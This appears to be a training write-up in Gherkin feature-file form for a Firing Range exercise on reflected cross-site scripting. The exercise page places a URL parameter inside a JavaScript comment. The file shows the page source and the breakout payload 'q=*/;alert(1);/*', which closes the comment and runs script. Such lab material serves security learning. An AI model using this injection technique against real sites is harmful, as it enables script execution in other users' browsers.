# language: en

Feature: Reflected XSS - JS Comment
  From the Firing Range system

  Background:
    Given I'm running Debian GNU/Linux 9 (stretch)
    And also using Chrome Version 69.0.3497.81
    Given the following scenario
    """
    URL: public-firing-range.appspot.com/reflected/parameter/js_comment?q=a
    Message: Inserts the parameter into a javascript comment, i.e. /* %q */
    Details:
      - The page shows an 'a' on the top
    Objective: Perform an reflected xss on the eval function of the page
    """
    Scenario: HTML injection attempt
    Given the following HTML code for the page
    """
    <html>
      <body>
        <script>var foo=1; /* "a" */</script>
      </body>
    </html>

    """
    Then I see the URL
    And notice that 'q' parameter is the content of the body within a comment
    And  I replace the 'q' parameter by the following code in html
    """
    q=*/;alert(1);/*

    """
    Then the page was reloaded with our XSS injection
    """
    <html>
      <body>
        <script>var foo=1; /* "*/;alert(1);/*" */</script>
      </body>
    </html>

    """
